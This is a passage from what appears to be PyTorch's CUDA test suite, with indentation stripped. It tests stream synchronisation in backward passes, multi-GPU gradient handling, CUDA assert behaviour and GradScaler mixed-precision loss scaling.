output = MultiplyInStream.apply(x, 2)
output.sum().backward()
# sync needed
default_stream.wait_stream(stream)
self.assertEqual(x.grad, torch.ones_like(x) * 2)
self.assertEqual(torch.cuda.current_stream(), default_stream)
# Tests that using grads in the same stream context as backward()
# is safe regardless what streams bwd ops ran on
bwd_ambient_stream = torch.cuda.Stream()
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 3)
with torch.cuda.stream(bwd_ambient_stream):
bwd_ambient_stream.wait_stream(stream)
output.sum().backward()
# x was first used on "stream" so its AccumulateGrad leaf should run on "stream".
# The end of backward() should have synced "bwd_ambient_stream" with "stream"
# so it should be safe to use x.grad here without any syncs.
self.assertEqual(x.grad, torch.ones_like(x) * 3)
self.assertEqual(torch.cuda.current_stream(), bwd_ambient_stream)
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
def test_streaming_backwards_multiple_streams(self):
MultiplyInStream = self._make_multiply_in_stream()
class StreamModel(torch.nn.Module):
def __init__(self):
super(StreamModel, self).__init__()
self.event = torch.cuda.Event()
self.stream0 = torch.cuda.Stream()
self.stream1 = torch.cuda.Stream()
def forward(self, x, x_first_use_on_ambient):
if x_first_use_on_ambient:
x0 = x.clone()
self.stream0.wait_stream(torch.cuda.current_stream())
self.stream1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(self.stream0):
if not x_first_use_on_ambient:
x0 = x.clone()
y0 = MultiplyInStream.apply(x0, 2)
self.event.record(stream=torch.cuda.current_stream())
with torch.cuda.stream(self.stream1):
y1 = MultiplyInStream.apply(x, 3)
self.stream1.wait_event(self.event)
return y0 + y1
stream = torch.cuda.Stream()
for x_first_use_on_ambient in (True, False):
# the out_of_place=False, iters=1 case stresses if proper syncs are inserted
# when grads are initially None and stolen by backward ops.
for out_of_place, iters in ((True, 1),
(False, 1),
(False, 5)):
with torch.cuda.stream(stream):
x = torch.randn(5, 5, device='cuda', requires_grad=True)
model = StreamModel().cuda()
x.register_hook(lambda grad: self.assertEqual(torch.cuda.current_stream(),
stream if x_first_use_on_ambient else model.stream0))
for p in model.parameters():
self.assertTrue(p.grad is None)
for i in range(iters):
loss = model(x, x_first_use_on_ambient).sum()
if out_of_place:
x_grad = torch.autograd.grad((loss,), (x,))[0]
else:
loss.backward()
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
torch.cuda.current_stream().wait_stream(stream)
if out_of_place:
self.assertEqual(x_grad, torch.ones_like(x) * 5 * iters)
else:
self.assertEqual(x.grad, torch.ones_like(x) * 5 * iters)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_streaming_backwards_device_transfer(self):
# This function must run with non-default current streams on all devices, otherwise it's meaningless.
# The intention is to test that to()'s backward (CopyBackward) interacts properly with the
# synchronization logic in torch/csrc/autograd/input_buffer.cpp.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
# Unfortunately I need to make the tensors largeish.
# Bigger tensors = longer D2D transfers = more likely to expose races.
size = 2**26
a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
# Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input.
# This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer.
to_backward_recipient = a * b
s = to_backward_recipient.to(device="cuda:0").sum()
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s.backward()
self.assertTrue(a.grad.sum().item() == size)
self.assertTrue(b.grad.sum().item() == size)
# Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs.
# This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer.
a.grad = None
b.grad = None
to_backward_recipient = a * b
# Multiply by 2 here so to's backward creates gradient values that are different from the case above,
# to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated
# with 1s by the case above
s0 = to_backward_recipient.to(device="cuda:0").sum() * 2.
s1 = to_backward_recipient.to(device="cuda:0").sum() * 2.
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s0.backward(retain_graph=True)
s1.backward()
self.assertTrue(a.grad.sum().item() == 4 * size)
self.assertTrue(b.grad.sum().item() == 4 * size)
def test_streaming_backwards_sync_graph_root(self):
# This function tests if bwd ops running on a side stream properly sync with the GraphRoot.
# The potential bug it targets is a race condition. The test uses multiple trials and
# torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail,
# but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free,
# but failure does guarantee there is a bug.
fwd_bwd_op_stream = torch.cuda.Stream()
bwd_ambient_stream = torch.cuda.Stream()
# We need these streams to be different otherwise the test is meaningless.
self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream)
size = int(1e3)
a = torch.full((size,), 2.0, device="cuda", requires_grad=True)
b = torch.full((size,), 3.0, device="cuda", requires_grad=True)
# I don't think we need any manual record_streams below.
# a and b remain in scope for the entire test.
# c and grad remain in scope for each iteration, and there's a full sync between iterations.
for trial in range(5):
torch.cuda.synchronize()
a.grad = b.grad = None
with torch.cuda.stream(fwd_bwd_op_stream):
c = a * b
with torch.cuda.stream(bwd_ambient_stream):
torch.cuda.synchronize()
# Long-running dummy kernel on bwd_ambient_stream delays filling of grad
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
# Fills grad on bwd_ambient_stream
grad = torch.full((size,), float(trial + 1), device="cuda")
# Bwd ops still run on fwd_bwd_ops_stream, so the following will likely fail if
# bwd ops don't sync with bwd_ambient_stream before consuming grad.
torch.autograd.backward(tensors=c, grad_tensors=grad)
# See https://github.com/pytorch/pytorch/issues/47028
# assertEquals below run on bwd_ambient_stream, so this test may also fail
# if backward() fails to sync with bwd_ambient_stream at the end.
# Synchronizing here works around the issue until a proper fix can be made.
torch.cuda.synchronize()
with torch.no_grad():
self.assertEqual(a.grad, grad * b)
self.assertEqual(b.grad, grad * a)
def test_streaming_backwards_callback(self):
# Tests if autograd callbacks sync properly with respect to leaf streams and
# the user-facing stream surrounding backward(). If it fails, first suspect is
# sync logic where "final_callbacks_" are called in torch/csrc/autograd/engine.cpp
MultiplyInStream = self._make_multiply_in_stream()
size = int(1e3)
a = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
b = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True)
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
stash = []
# sets up a nontrivial structure of leaf streams
s0.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s0):
c = MultiplyInStream.apply(a, 2)
s1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s1):
d = MultiplyInStream.apply(b, 3)
s1.wait_stream(s0)
e = c * d
def clone_leaf_grads():
stash.append(a.grad.clone())
stash.append(b.grad.clone())
# Use a hook on e to install the callback
e.register_hook(lambda grad: torch.autograd.Variable._execution_engine.queue_callback(clone_leaf_grads))
s2.wait_stream(s1)
with torch.cuda.stream(s2):
e.sum().backward()
# The autograd engine should sync s2 with all leaf streams then run the callback clone_leaf_grads on s2.
# If those things happened properly, checking the values of the cloned grads on s2 should be safe:
self.assertEqual(stash[0], torch.full_like(a, 6))
self.assertEqual(stash[1], torch.full_like(a, 6))
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
@unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle")
def test_cuda_init_race(self):
# See https://github.com/pytorch/pytorch/issues/16559
import subprocess
subprocess.check_call([sys.executable, '-c', """\
import torch
import threading
def worker(rank):
torch.tensor([1.]).cuda(rank)
t1 = threading.Thread(target=worker, args=(0,))
t2 = threading.Thread(target=worker, args=(1,))
t1.start()
t2.start()
"""])
def test_fixed_cuda_assert_async(self):
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"):
torch._assert_async(torch.tensor([], device="cuda"))
with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"):
torch._assert_async(torch.tensor([0, 0], device="cuda"))
torch._assert_async(torch.tensor(1, device="cuda"))
torch._assert_async(torch.tensor(0.1, device="cuda"))
torch._assert_async(torch.tensor(-0.1, device="cuda"))
torch._assert_async(torch.tensor(True, device="cuda"))
torch._assert_async(torch.tensor(0 + 0.1j, device="cuda"))
fail_stmts = [
"torch._assert_async(torch.tensor(0, device='cuda'))",
"torch._assert_async(torch.tensor(0.0, device='cuda'))",
"torch._assert_async(torch.tensor(False, device='cuda'))",
"torch._assert_async(torch.tensor(0 + 0j, device='cuda'))",
]
import subprocess
for stmt in fail_stmts:
with self.subTest(stmt=stmt):
r = subprocess.call([sys.executable, '-c', f"""\
import torch
{stmt}
torch.cuda.synchronize()
"""])
self.assertTrue(r != 0)
def test_grad_scaling_unscale(self, dtype=torch.float):
inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0")
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
size = 10
g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0")
ginf = g.clone()
ginf[2, 2] = float('inf')
gnan = g.clone()
gnan[2, 2] = float('nan')
# Tries selected combinations of
# - contiguous grads
# - g.clone().t() which is not contiguous but still non overlapping and dense
# - variants of g.clone()[:, :5] which are not non overlapping and dense
# Non overlapping and dense grads route into a multi tensor apply kernel,
# others use a fallback per-tensor kernel, so we should try both.
cases = (
([g.clone(), g.clone()], False),
([g.clone(), g.clone().t()], False),
([g.clone(), g.clone()[:, :5]], False),
([g.clone()[:, :5], g.clone()[:, :5]], False),
([g.clone(), ginf.clone()], True),
([g.clone(), gnan.clone()], True),
([g.clone(), ginf.clone()[:, :5]], True),
([g.clone(), gnan.clone()[:, :5]], True),
([ginf.clone(), g.clone()[:, :5]], True),
([ginf.clone()[:, :5], g.clone()[:, :5]], True),
)
for grads, has_inf in cases:
found_inf.zero_()
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
if has_inf:
self.assertEqual(found_inf, 1.0)
else:
self.assertEqual(found_inf, 0.0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# When passing lists with mismatched dtypes to a raw
# _amp_foreach_non_finite_check_and_unscale_ call,
# it's expected to fall back to single-tensor TensorIterator kernel.
grads = [g.clone(), g.to(dtype=torch.float16)]
torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
# Passing lists with mismatched devices to a raw
# _amp_foreach_non_finite_check_and_unscale_ call should raise errors.
if TEST_MULTIGPU:
with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"):
torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")],
found_inf,
inv_scale)
# Creates a list of grads with mismatched dtypes and devices, to ensure
# scaler._unscale_grads_ organizes grads by dtype and device before calling
# _amp_foreach_non_finite_check_and_unscale_ on each set.
# If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find.
def perfect_storm_grads(inject_inf):
grads = [g.clone(), g.clone()[:, :5], g.to(dtype=torch.float16), g.to(dtype=torch.float16)]
if TEST_MULTIGPU:
grads += [g.to(device="cuda:1"),
g.to(device="cuda:1")[:, :5],
g.to(device="cuda:1", dtype=torch.float16),
g.to(device="cuda:1", dtype=torch.float16)]
if inject_inf >= 0:
grads[inject_inf][2, 2] = float('inf')
return grads
scaler = torch.cuda.amp.GradScaler()
dummy_params = [torch.empty_like(g) for g in perfect_storm_grads(-1)]
dummy_opt = torch.optim.SGD(dummy_params, lr=1.)
# Ensures the inf/nan checking can find an inf injected onto any grad in the perfect storm.
for inject_inf in range(-1, len(dummy_params)):
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
grads = perfect_storm_grads(inject_inf)
for i, p in enumerate(dummy_params):
p.grad = grads[i]
found_inf_per_device = scaler._unscale_grads_(dummy_opt, inv_scale, found_inf, True)
if inject_inf < 0:
# No inf was injected, ensures unscaling worked normally.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 0)
for grad in grads:
self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7)
else:
# inf was injected, ensures inf was found.
self.assertTrue(sum(v.item() for v in found_inf_per_device.values()) == 1)
def test_grad_scaling_update_scale(self, device="cuda", dtype=torch.float):
growth = 2.0
backoff = 0.25
growth_interval = 2
scale = torch.full((1,), 4.0, dtype=dtype, device=device)
growth_tracker = torch.full((1,), 0.0, dtype=torch.int32, device=device)
found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0")
# Simulates 2 consecutive unskipped iterations
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 1)
self.assertEqual(scale, 4.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 8.0)
# Simulates a skipped iteration
found_inf.fill_(1.0)
torch._amp_update_scale_(scale, growth_tracker, found_inf, growth, backoff, growth_interval)
self.assertEqual(growth_tracker, 0)
self.assertEqual(scale, 2.0)
def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float):
scaler = torch.cuda.amp.GradScaler()
inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device)
found_inf = torch.empty((1,), dtype=dtype, device=device)
cur = found_inf.device
# As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction.
# https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring.
# The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout.
# Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks
# legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor.
i = torch.tensor([[0, 1, 1],
[2, 0, 2]], device="cuda", dtype=torch.int64)
v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float)
s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
p = s.clone()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s / 4).to_dense())
v = torch.FloatTensor([16., 32., float('inf')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
v = torch.FloatTensor([16., 32., float('nan')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
p = s.clone().half()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone().half()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s.half() / 4).to_dense())
# Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation
# does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max.
# _amp_non_finite_check_and_unscale_ should report an overflow here.
i = torch.LongTensor([[0, 1, 0],
[2, 0, 2]])
v = torch.FloatTensor([64000., 32., 64000.])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 1.0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_device_as_key(self):
# Ensure that different instances of "device" objects that point to the same device
# are treated as identical keys by dicts. GradScaler relies on this behavior, and may
# error otherwise in a way that's difficult to detect (a silent performance hit).
d = {}
t = torch.empty((1,), device="cuda:0")
dev0a = torch.device("cuda:0")
dev0b = torch.device("cuda:0")
dev1a = torch.device("cuda:1")
dev1b = torch.device("cuda:1")
self.assertTrue(hash(dev0a) == hash(dev0b))
self.assertTrue(hash(dev1a) == hash(dev1b))
d[dev0a] = "0a"
d[dev0b] = "0b"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "0b")
d[t.device] = "t"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "t")
d[dev1a] = "1a"
d[dev1b] = "1b"
self.assertTrue(len(d) == 2)
self.assertTrue(d[dev1a] == "1b")
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_scale(self):
scaler = torch.cuda.amp.GradScaler(init_scale=2.)
t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")
t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1")
# Create some nested iterables of tensors on different devices.
outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())])
outputs = scaler.scale(outputs)
self.assertTrue(outputs[0] == 8.0 and outputs[1][0] == 8.0 and outputs[1][1] == 8.0 and
outputs[2][0] == 8.0 and outputs[2][1][0] == 8.0 and outputs[2][1][1] == 8.0)
self.assertTrue(scaler._scale.device == t1.device)
def test_grad_scaling_state_dict(self):
for lazy_init_scale in True, False:
s0 = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2)
s1 = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1)
# sets a random value for load_state_dict to overwrite
s1._init_growth_tracker = 7
if lazy_init_scale:
# Dummy scale() call to ensure the scale tensor is lazily initialized.
s1.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0"))
self.assertTrue(isinstance(s1._scale, torch.cuda.FloatTensor))
s1.load_state_dict(s0.state_dict())
self.assertEqual(s1.get_scale(), 3.)
self.assertEqual(s1.get_growth_factor(), 4.)
self.assertEqual(s1.get_backoff_factor(), .5)
self.assertEqual(s1.get_growth_interval(), 2)
self.assertEqual(s1._init_growth_tracker, 0)
def _create_scaling_models_optimizers(self, device="cuda"):
# Create a module+optimizer that will use scaling, and a control module+optimizer
# that will not use scaling, against which the scaling-enabled module+optimizer can be compared.
mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
s.data.copy_(c.data)
opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0)
opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0)
return mod_control, mod_scaling, opt_control, opt_scaling
def _create_scaling_case(self, device="cuda", dtype=torch.float):
data = [(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device))]
loss_fn = torch.nn.MSELoss().cuda()
skip_iter = 2
return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter)
# _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below.
def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7):
# Ensure scaling can be disabled without changing user control flow.
for enabled in True, False:
mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case()
# For functionality, test with a modest initial scale, and an unrealistically-large growth factor
# so any potential errors with the growth factor handling will be magnified.
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
_ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False)
ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True)
# Allows run() to optionally return a different scaler instance.
scaler = ret if ret else scaler
# If scaling was enabled, the scale factor should have been multiplied by the growth factor
# len(data) - skipped times and the backoff factor "skipped" times.
if enabled:
net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0
net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0
self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff))
else:
self.assertTrue(scaler.get_scale() == 1.0)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
self.assertEqual(c, s, atol=atol, rtol=1e-05)
# Compares no scaling + no autocasting against scaling + autocasting.
def test_grad_scaling_autocast(self):
try_pickle = False
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
with torch.autocast('cuda', enabled=try_scaling_api):
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
if try_pickle:
scaler = pickle.loads(pickle.dumps(scaler))
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
return scaler
# sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
# this will be picked up by try_pickle within run():
try_pickle = True
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
def test_grad_scaling_clipping(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale())
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-5)
def test_grad_scaling_clipping_separate_unscale(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False)
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
@unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows')
def test_grad_scaling_penalty(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
grad_params = torch.autograd.grad(scaler.scale(loss),
model.parameters(), create_graph=True)
inv_scale = 1. / scaler.get_scale()
grad_params = [p * inv_scale for p in grad_params]
else:
grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True)
grad_norm = 0
for grad in grad_params:
grad_norm += grad.pow(2).sum()
grad_norm = grad_norm.sqrt()
loss = loss + grad_norm
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_accumulation(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
iters_to_accumulate = 2
for i, (input, target) in enumerate(data):
output = model(input)
loss = loss_fn(output, target)
loss = loss / iters_to_accumulate
if try_scaling_api:
scaler.scale(loss).backward()
else:
loss.backward()
if (i + 1) % iters_to_accumulate == 0:
if try_scaling_api:
scaler.step(optimizer)
scaler.update()
optimizer.zero_grad()
else:
optimizer.step()
optimizer.zero_grad()
self._run_scaling_case(run, unskipped=2, skipped=0)
def test_grad_scaling_multiple(self):
# Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses.
# Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases.
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers()
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input)
loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target)
loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target)
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_multigpu(self):
# Same as above, but runs some of the models on device 1.
# GradScaler should transparently handle losses and gradients on multiple devices.
# This test could be combined with the test above, but I think it makes sense to treat
# multi-GPU operations separately.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers(device=dev1)
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input.to(dev1))
loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target)
loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1))
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
# Make sure the found_infs were collected properly across optimizers and devices.
if scaler.is_enabled():
self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1)
self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1)
self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.)
self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() ==
float(i == skip_iter))
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == (128. * scaler.get_growth_factor()**3 *
scaler.get_backoff_factor()**1) if enabled else 1.0)
# Copy mod_control1 and mod_scaling1 back the device 0 for comparison
mod_control1.to(dev0)
mod_scaling1.to(dev0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
def test_cublas_multiple_threads_same_device(self):
# Note, these parameters should be very carefully tuned
# Too small number makes it hard for the racing condition
# to happen, while too large number sometimes cause hang
size = 1024
num_threads = 2
trials = 3
test_iters = 100
weight = torch.ones((size, size), device='cuda')
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
